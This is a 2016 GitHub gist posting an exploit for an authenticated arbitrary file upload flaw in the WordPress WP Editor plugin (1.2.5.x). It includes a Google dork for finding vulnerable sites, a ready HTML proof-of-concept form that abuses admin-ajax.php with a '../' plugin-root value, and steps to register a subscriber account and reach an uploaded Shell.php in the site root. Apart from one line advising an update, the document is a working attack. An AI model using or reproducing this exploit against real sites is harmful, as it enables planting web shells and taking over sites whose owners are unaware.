Created
October 9, 2016 07:15
-
-
Save ichsanbahri/a67afca718b1be887a32188198f8d190 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
######################################################### | |
# Exploit Title: Wordpress WP Editor Authenticated Arbitrary File Upload Vulnerability | |
# Category: webapps | |
# Software Link: https://wordpress.org/plugins/wp-editor/ | |
# version affected : 1.2.5.x | |
# Google Dork : inurl:/wp-content/plugins/wp-editor/ | |
######################################################## | |
------------------------------------------------------------------------------- | |
# [-]Proof of Concept | |
<html> | |
<head> | |
</head> | |
<body> | |
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data"> | |
<input type="hidden" name="action" value="upload_files" /> | |
<input type="hidden" name="current_plugin_root" value="../" /> | |
<input type="hidden" name="directory" value="" /> | |
<input type="file" name="file-0" /> | |
<input type="submit" value="Submit" /> | |
</form> | |
</body> | |
</html> | |
# | |
# logged in to Wordpress as a "subscriber level or higher user" | |
# | |
# Add User subscriber | |
# /wp-login.php?action=register | |
# | |
# upload the chosen file using The following proof of concept | |
# the Uploaded file will be in the root directory of the WordPress installation | |
# http://www.Target.com/Shell.php | |
------------------------------------------------------------------------------- | |
solution : | |
update to the latest version |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment